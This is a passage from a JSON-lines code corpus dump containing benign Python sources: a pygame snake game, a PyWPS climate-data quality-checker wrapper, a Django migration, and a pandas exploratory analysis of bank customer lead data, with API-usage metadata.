{"api_name": "models.Tweet.objects.order_by", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Tweet.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 32, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Tweet.objects.all", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 50, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 56, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 56, "usage_type": "name"}, {"api_name": "models.Tweet.objects.get", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 58, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 61, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 64, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 64, "usage_type": "name"}, {"api_name": "models.Tweet", "line_number": 65, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 75, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 75, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 79, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 79, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 80, "usage_type": "name"}, {"api_name": "forms.MessageForm", "line_number": 81, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "forms.MessageForm", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Message.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 96, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 97, "usage_type": "name"}, {"api_name": "forms.MessageForm", "line_number": 98, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Message.objects.create", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 106, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 107, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 107, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 108, "usage_type": "name"}, {"api_name": "forms.MessageForm", "line_number": 109, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 114, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 116, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 116, "usage_type": "name"}, {"api_name": "models.Message.objects.get", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 120, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 130, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 133, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 133, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.all", "line_number": 136, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 136, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 136, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 144, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 150, "usage_type": "name"}, {"api_name": "models.UserExtra", "line_number": 151, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 154, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 154, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 158, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 161, "usage_type": "name"}, {"api_name": "django.contrib.auth.logout", "line_number": 163, "usage_type": "call"}, {"api_name": "django.http.response.HttpResponseRedirect", "line_number": 165, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 168, "usage_type": "name"}, {"api_name": "forms.LoginForm", "line_number": 170, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 172, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 175, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 179, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 183, "usage_type": "call"}, {"api_name": "django.http.response.HttpResponseRedirect", "line_number": 185, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 188, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 190, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 194, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 196, "usage_type": "name"}, {"api_name": "forms.RegisterForm", "line_number": 198, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 200, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 203, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 209, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 209, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 209, "usage_type": "name"}, {"api_name": "models.UserExtra", "line_number": 210, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 213, "usage_type": "call"}, {"api_name": "django.http.response.HttpResponseRedirect", "line_number": 214, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 218, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 220, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 224, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 231, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 231, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 233, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 253, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 259, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 261, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 262, "usage_type": "call"}, {"api_name": "models.Tweet.objects.order_by", "line_number": 263, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 263, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 263, "usage_type": "name"}, {"api_name": "models.Tweet.objects.filter", "line_number": 265, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 265, "usage_type": "name"}, {"api_name": "serializers.TweetSerializer", "line_number": 266, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 267, "usage_type": "call"}, {"api_name": "serializers.TweetSerializer", "line_number": 270, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 273, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 273, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 273, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 274, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 274, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 274, "usage_type": "name"}]} +{"seq_id": "602390429", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport random\nimport time\n\nimport pygame\n\nfrom scenes import GameOver, Intro\nimport color\nimport constants\nimport utils\n\n\nclass SpartanSlither(object):\n\n def __init__(self, resolution=constants.RESOLUTION, fps=constants.FPS):\n pygame.init()\n\n if not isinstance(resolution, (tuple, list)):\n raise TypeError(\n \"{} is not a valid resolution. Was expecting tuple or \"\n \"list\".format(resolution)\n )\n self.resolution = utils.Resolution(*resolution)\n\n self.clock = pygame.time.Clock()\n self.fps = fps\n self.display = pygame.display.set_mode(self.resolution)\n pygame.display.set_caption(\"Spartan Slither\")\n\n self.background_color = color.WHITE\n\n self.sparty_image = pygame.image.load(\"resources/sparty.png\")\n self.block_s = pygame.image.load(\"resources/ms_block_s.png\")\n self.wolvie_image = pygame.image.load(\"resources/wolvie.png\")\n self.block_w = pygame.image.load(\"resources/block_w.png\")\n\n def initialize_start(self):\n self.level = 10\n self.speed = 10\n\n self.display.fill(self.background_color)\n self.game_exit = False\n self.game_over = False\n self.lead_x = self.resolution.width / 2\n self.lead_y = self.resolution.height / 2\n self.lead_x_change = 10\n self.lead_y_change = 0\n\n self.sparty_size = 20\n self.sparty_head = (self.lead_x, self.lead_y)\n self.sparty_list = [self.sparty_head]\n self.sparty_length = 1\n self.wolvie_size = 20\n self.wolvie = utils.Wolvie(0, 0, 0, 0)\n\n def run(self):\n self.intro_loop()\n while not self.game_exit:\n self.sparty_head = (self.lead_x, self.lead_y)\n self.is_game_over()\n self.handle_events()\n self.check_location()\n self.update()\n self.clock.tick(self.fps)\n\n self.exit()\n\n def handle_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.game_exit = True\n\n if event.type == pygame.KEYDOWN:\n self.keydown_event(event)\n\n self.lead_x += self.lead_x_change\n self.lead_y += self.lead_y_change\n\n def keydown_event(self, event):\n \"\"\" Logic for handling keydown event \"\"\"\n if event.key == pygame.K_q:\n self.game_exit = True\n if event.key == pygame.K_LEFT:\n self.lead_x_change = self.speed * -1\n self.lead_y_change = 0\n elif event.key == pygame.K_RIGHT:\n self.lead_x_change = self.speed\n self.lead_y_change = 0\n elif event.key == pygame.K_UP:\n self.lead_y_change = self.speed * -1\n self.lead_x_change = 0\n elif event.key == pygame.K_DOWN:\n self.lead_y_change = self.speed\n self.lead_x_change = 0\n\n def update(self):\n self.display.fill(self.background_color)\n self.draw_wolvie()\n self.draw_sparty()\n pygame.display.update()\n\n def draw_sparty(self):\n if len(self.sparty_list) > self.sparty_length:\n del self.sparty_list[0]\n\n if self.lead_x_change or self.lead_y_change:\n self.sparty_list.append(self.sparty_head)\n\n sparty_image = self._get_sparty_image()\n self.display.blit(sparty_image, self.sparty_list[-1])\n\n for x_pos, y_poz in self.sparty_list[:-1]:\n pygame.draw.rect(\n self.display, color.SPARTAN,\n [x_pos, y_poz, self.sparty_size, self.sparty_size]\n )\n\n def _get_sparty_image(self):\n if self.lead_x_change < 0:\n sparty_rotated = pygame.transform.flip(\n self.sparty_image, True, False)\n else:\n rotation = utils.get_rotation(\n self.lead_x_change, self.lead_y_change\n )\n sparty_rotated = pygame.transform.rotate(\n self.sparty_image, rotation)\n return sparty_rotated\n\n def draw_wolvie(self):\n if not (self.wolvie.x or self.wolvie.y):\n x_max = self.resolution.width - self.wolvie_size\n y_max = self.resolution.height - self.wolvie_size\n self.wolvie = utils.Wolvie(\n x=round(random.randrange(0, x_max)),\n y=round(random.randrange(0, y_max)),\n x_size=self.wolvie_size,\n y_size=self.wolvie_size\n )\n self.display.blit(self.wolvie_image, self.wolvie.dimensions)\n\n def check_location(self):\n self._check_boundary_collision()\n self._did_sparty_destroy_wolvie()\n\n if len(self.sparty_list) > 1:\n for segment in self.sparty_list[:-1]:\n if segment == self.sparty_head:\n self.game_over = True\n\n def _check_boundary_collision(self):\n if (\n self.lead_x + self.sparty_size > self.resolution.width or\n self.lead_x < 0 or\n self.lead_y + self.sparty_size > self.resolution.height or\n self.lead_y < 0\n ):\n self.game_over = True\n\n def _did_sparty_destroy_wolvie(self):\n \"\"\"\n Checks collission of Sparty with the wolverine. This takes into account\n if they are different sizes\n \"\"\"\n sparty_size = self.lead_x + self.sparty_size\n wolvie_size = self.wolvie.x + self.wolvie_size\n if (\n self.lead_x >= self.wolvie.x and self.lead_x <= wolvie_size or\n sparty_size >= self.wolvie.x and sparty_size <= wolvie_size\n ):\n sparty_size = self.lead_y + self.sparty_size\n wolvie_size = self.wolvie.y + self.wolvie_size\n if (\n self.lead_y >= self.wolvie.y and self.lead_y <= wolvie_size or\n sparty_size >= self.wolvie.y and sparty_size <= wolvie_size\n ):\n self.wolvie.x = 0\n self.wolvie.y = 0\n self.sparty_length += 5\n\n def is_game_over(self):\n if self.game_over:\n exit_game = GameOver(\n display=self.display, pygame=pygame,\n clock=self.clock,\n image=self.block_w,\n resolution=self.resolution\n ).run()\n if exit_game:\n self.game_exit = True\n else:\n self.initialize_start()\n\n def exit(self):\n \"\"\" Handle exiting the game, show a message, close it all down nicely.\n \"\"\"\n self.display.fill(color.SPARTAN)\n utils.Renderer.display_message_to_screen(\n self.display, self.resolution, \"Go Green! Go White!\",\n self.background_color, pygame, y_displacement=-100,\n font_size=constants.MEDIUM\n )\n\n utils.Renderer.render_block_letter_image(\n self.display, self.block_s, self.resolution\n )\n\n utils.Renderer.display_message_to_screen(\n self.display, self.resolution, \"Thanks for playing!\",\n self.background_color, pygame, y_displacement=100\n )\n pygame.display.update()\n time.sleep(2)\n\n pygame.quit()\n quit()\n\n def intro_loop(self):\n start = Intro(\n display=self.display, pygame=pygame, clock=self.clock,\n resolution=self.resolution\n ).run()\n if start:\n self.initialize_start()\n else:\n self.game_exit = True\n\n\nif __name__ == \"__main__\":\n SpartanSlither().run()\n", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7563, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "constants.RESOLUTION", "line_number": 17, "usage_type": "attribute"}, {"api_name": "constants.FPS", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.Resolution", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 30, "usage_type": "attribute"}, {"api_name": "color.WHITE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 37, "usage_type": "attribute"}, {"api_name": "utils.Wolvie", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 71, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.K_q", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 102, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 102, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 115, "usage_type": "attribute"}, {"api_name": "color.SPARTAN", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 122, "usage_type": "attribute"}, {"api_name": "utils.get_rotation", "line_number": 125, "usage_type": "call"}, {"api_name": "pygame.transform.rotate", "line_number": 128, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.Wolvie", "line_number": 136, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 137, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 138, "usage_type": "call"}, {"api_name": "scenes.GameOver", "line_number": 185, "usage_type": "call"}, {"api_name": "color.SPARTAN", "line_number": 199, "usage_type": "attribute"}, {"api_name": "utils.Renderer.display_message_to_screen", "line_number": 200, "usage_type": "call"}, {"api_name": "utils.Renderer", "line_number": 200, "usage_type": "attribute"}, {"api_name": "constants.MEDIUM", "line_number": 203, "usage_type": "attribute"}, {"api_name": "utils.Renderer.render_block_letter_image", "line_number": 206, "usage_type": "call"}, {"api_name": "utils.Renderer", "line_number": 206, "usage_type": "attribute"}, {"api_name": "utils.Renderer.display_message_to_screen", "line_number": 210, "usage_type": "call"}, {"api_name": "utils.Renderer", "line_number": 210, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 214, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 214, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 215, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 217, "usage_type": "call"}, {"api_name": "scenes.Intro", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "131126774", "text": "import tarfile\n\nfrom pywps import Process\nfrom pywps import LiteralInput\nfrom pywps import ComplexInput, ComplexOutput\nfrom pywps import Format\nfrom pywps.app.Common import Metadata\n\nimport logging\nLOGGER = logging.getLogger(\"PYWPS\")\n\n\nclass QualityChecker(Process):\n def __init__(self):\n inputs = [\n ComplexInput('dataset', 'NetCDF File',\n abstract='You may provide a URL or upload a NetCDF file.',\n min_occurs=1,\n max_occurs=1024,\n supported_formats=[Format('application/x-netcdf')]),\n LiteralInput('project', 'Project',\n data_type='string',\n abstract=\"Climate model data project to be checked: CORDEX or CMIP5\",\n min_occurs=1,\n max_occurs=1,\n default='CORDEX',\n allowed_values=['CORDEX', 'CMIP5']),\n ]\n outputs = [\n ComplexOutput('output', 'Quality Checker Report',\n abstract=\"Qualtiy checker results as tar archive.\",\n as_reference=True,\n supported_formats=[Format('application/x-tar-gz')]),\n ComplexOutput('logfile', 'Quality Checker Logfile',\n abstract=\"Qualtiy checker summary logfile\",\n as_reference=True,\n supported_formats=[Format('text/yaml')]),\n ]\n\n super(QualityChecker, self).__init__(\n self._handler,\n identifier=\"qa_checker\",\n title=\"Quality Assurance Checker by DKRZ\",\n version=\"0.6.3\",\n abstract=\"The Quality Assurance checker QA-DKRZ checks conformance of meta-data of climate simulations\"\n \" given in NetCDF format with conventions and rules of climate model projects.\"\n \" At present, checking of CF Conventions, CMIP5, and CORDEX is supported.\"\n \" Development and maintenance for the QA checker is done by the\"\n \" German Climate Computing Centre (DKRZ).\"\n \" If you have suggestions for improvement then please contact\"\n \" Heinz-Dieter Hollweg at DKRZ (hollweg@dkrz.de).\",\n metadata=[\n Metadata('Birdhouse', 'http://bird-house.github.io/'),\n Metadata('User Guide', 'http://birdhouse-hummingbird.readthedocs.io/en/latest/'),\n Metadata('CF Conventions', 'http://cfconventions.org/'),\n Metadata('QA Checker Documentation', 'http://qa-dkrz.readthedocs.io/en/latest/'),\n Metadata('Conda Package', 'http://anaconda.org/birdhouse/qa-dkrz'),\n Metadata('GitHub', 'https://github.com/IS-ENES-Data/QA-DKRZ'),\n ],\n inputs=inputs,\n outputs=outputs,\n status_supported=True,\n store_supported=True,\n )\n\n def _handler(self, request, response):\n from hummingbird.processing import hdh_qa_checker\n\n response.update_status(\"starting qa checker ...\", 0)\n\n datasets = [dataset.file for dataset in request.inputs['dataset']]\n logfile = results_path = None\n for idx, ds in enumerate(datasets):\n progress = idx * 100 / len(datasets)\n response.update_status(\"checking %s\" % ds, progress)\n logfile, results_path = hdh_qa_checker(ds, project=request.inputs['project'][0].data)\n if logfile and results_path:\n # output tar archive\n with tarfile.open('output.tar.gz', \"w:gz\") as tar:\n response.outputs['output'].file = tar.name\n tar.add(results_path)\n response.outputs['logfile'].file = logfile\n\n response.update_status(\"qa checker done.\", 100)\n return response\n", "sub_path": "hummingbird/processes/wps_hdh_qachecker.py", "file_name": "wps_hdh_qachecker.py", "file_ext": "py", "file_size_in_byte": 3916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "pywps.Process", "line_number": 13, "usage_type": "name"}, {"api_name": "pywps.ComplexInput", "line_number": 16, "usage_type": "call"}, {"api_name": "pywps.Format", "line_number": 20, "usage_type": "call"}, {"api_name": "pywps.LiteralInput", "line_number": 21, "usage_type": "call"}, {"api_name": "pywps.ComplexOutput", "line_number": 30, "usage_type": "call"}, {"api_name": "pywps.Format", "line_number": 33, "usage_type": "call"}, {"api_name": "pywps.ComplexOutput", "line_number": 34, "usage_type": "call"}, {"api_name": "pywps.Format", "line_number": 37, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 53, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 54, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 55, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 56, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 57, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 58, "usage_type": "call"}, {"api_name": "hummingbird.processing.hdh_qa_checker", "line_number": 76, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "276878867", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('web', '0008_auto_20150427_0106'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='designer',\n name='bank_account_bank',\n field=models.CharField(max_length=30, null=True),\n ),\n migrations.AlterField(\n model_name='designer',\n name='bank_account_name',\n field=models.CharField(max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='designer',\n name='bank_account_number',\n field=models.CharField(max_length=30, null=True),\n ),\n ]\n", "sub_path": "web/migrations/0009_auto_20150427_1950.py", "file_name": "0009_auto_20150427_1950.py", "file_ext": "py", "file_size_in_byte": 777, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "412491815", "text": "#Importing necessary Libraries\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sklearn\r\nfrom sklearn import preprocessing\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport warnings\r\nimport os\r\nwarnings.filterwarnings('ignore')\r\nsns.set_style('whitegrid')\r\n\r\n#Reading files\r\ntrain_data=pd.read_csv(os.getcwd() +'\\Customer_trainfile.csv')\r\ntest=pd.read_csv(os.getcwd() + '\\Customer_testfile.csv')\r\n\r\nprint(train_data.shape) #(245725, 11)\r\nprint(test.shape) #(105312, 10)\r\n\r\n#checking datatypes-----Age,Vintage,Avg_acc_bal,is_lead are int, remaining are object\r\nprint(train_data.info())\r\nprint(test.info())\r\n\r\nprint(train_data.nunique())\r\nprint(test.nunique())\r\n\r\n#Descriptive stats for Numeric Variables(train_data)\r\nNumStats=train_data.describe()\r\npd.set_option('display.max_columns',None)\r\nprint(NumStats)\r\n\r\n#Descriptive stats for Numeric Variables(test)\r\nNumStats=test.describe()\r\nprint(NumStats)\r\n\r\n#Checking Missing values---Credit_Product has missing Values\r\nprint(train_data.isnull().sum()) #29325 missing values\r\nprint(test.isnull().sum()) #12522 missing values\r\n\r\nprint(train_data['Credit_Product'].value_counts()) # No: 144357 , Yes: 72043\r\nprint(test['Credit_Product'].value_counts()) # No: 61608 , Yes: 31182\r\n\r\n#Filling the missing Values\r\ntrain_data['Credit_Product'].replace(np.nan,'Yes',inplace=True)\r\nprint(train_data.isnull().sum())\r\ntest['Credit_Product'].replace(np.nan,'Yes',inplace=True)\r\nprint(test.isnull().sum())\r\n\r\n\r\n#EDA---Exploratory Data Analysis(Univariate , Bivariate)\r\n#Train_data analysis\r\n#Target variable\r\nsns.countplot(train_data['Is_Lead'])\r\nplt.title('Is_Lead', fontsize = 10)\r\nfig1=plt.show()\r\n\r\n#Age Variable\r\ntrain_data.Age.hist()\r\nplt.title('Histogram of Age')\r\nplt.xlabel('Age')\r\nplt.ylabel('Frequency')\r\nfig2=plt.show()\r\n#concl: Most of the customers of the bank in this dataset are in the age range of 20-30.\r\n\r\n# Gender vs Is_Lead\r\nsns.countplot(x='Gender',hue='Is_Lead',data=train_data,palette='husl')\r\nfig3=plt.show()\r\n# Conclusion: Customers who bought credit card are mostly Males ,Less number of females have bought Credit Card\r\n\r\n#Occuption vs Is_Lead\r\nsns.countplot(x='Occupation',hue='Is_Lead',data=train_data,palette='husl')\r\nfig4=plt.show()\r\n#Concl: Mostly self employed customers has bought credit card and enterpreneurs the least\r\n\r\n# Credit_Product vs Occupation\r\nsns.countplot(x='Credit_Product',hue='Occupation',data=train_data,palette='husl')\r\nfig5=plt.show()\r\n# Nearly 33000 selfEmployed customers have active credit product so there is a possiblity that self employed customers may buy another credit card\r\n\r\n# Is_active vs Is_Lead\r\nsns.countplot(x='Is_Active',hue='Is_Lead',data=train_data,palette='husl')\r\nfig6=plt.show()\r\n#concl: Approx 25000 or 20-21% customers are active who are interested to buy credit card(lead)\r\n#and 30000-32000 or approx 25-27% customers are not active but interested to buy credit card(lead)\r\n\r\n# #Vintage variable analysis\r\nplt.figure(figsize=(13,7))\r\nplt.subplot(2,1,1)\r\nsns.distplot(train_data['Vintage'], color='green')\r\nplt.title(\"Vintage\")\r\nfig7=plt.show()\r\n\r\n# test data Analysis\r\n#Age Variable\r\ntest.Age.hist()\r\nplt.title('Histogram of Age')\r\nplt.xlabel('Age')\r\nplt.ylabel('Frequency')\r\nfig2a=plt.show()\r\n\r\n# Credit_Product vs Occupation\r\nsns.countplot(x='Credit_Product',hue='Occupation',data=test,palette='husl')\r\nfig5a=plt.show()\r\n\r\n# #Vintage variable analysis\r\nplt.figure(figsize=(13,7))\r\nplt.subplot(2,1,1)\r\nsns.distplot(test['Vintage'], color='green')\r\nplt.title(\"Vintage\")\r\nfig7a=plt.show()\r\n\r\n\r\n# Checking Avg_Account_Balance for Skewness and removing skewness.\r\n#Train\r\nsns.distplot(train_data['Avg_Account_Balance'])\r\nfig8=plt.show()\r\ntrain_data['Avg_Account_Balance'] = train_data['Avg_Account_Balance'].map(lambda i: np.log(i) if i > 0 else 0)\r\nsns.distplot(train_data['Avg_Account_Balance'])\r\nfig8ab=plt.show()\r\n#Test\r\nsns.distplot(test['Avg_Account_Balance'])\r\nfig9=plt.show()\r\ntest['Avg_Account_Balance'] = np.log(test['Avg_Account_Balance'])\r\nsns.distplot(train_data['Avg_Account_Balance'])\r\nfig9ab=plt.show()\r\n\r\n#Dropping the ID column\r\ntrain_data.drop(['ID'],axis=1,inplace=True)\r\ntest.drop(['ID'],axis=1, 